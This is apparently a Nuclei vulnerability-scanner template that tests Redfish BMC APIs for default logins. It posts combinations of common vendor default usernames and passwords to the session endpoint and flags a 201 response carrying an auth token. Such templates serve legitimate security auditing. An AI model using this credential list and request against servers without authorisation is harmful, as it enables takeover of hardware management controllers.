id: redfish-bmc-default-login

info:
  name: Redfish BMC/API Default Login
  author: c-sh0
  severity: high
  description: Redfish BMC/API Default Login
  reference:
    - https://ftp1.tyan.com/pub/doc/MiTAC_AST2500_Redfish_API_Doc_0.04.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: default-login,api,bmc,redfish

requests:
  - raw:
      - |
        POST /redfish/v1/SessionService/Sessions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"UserName":"{{username}}","Password":"{{password}}"}

    attack: clusterbomb
    payloads:
      username:
        - ADMIN
        - admin
        - root
        - Administrator
        - sysadmin
        - USERID
      password:
        - ADMIN
        - admin
        - superuser
        - PASSW0RD

    stop-at-first-match: true
    redirects: false
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 201

      - type: word
        part: header
        words:
          - "X-Auth-Token"

      - type: word
        part: body
        words:
          - "/redfish/v1/$metadataSessionService/Sessions"
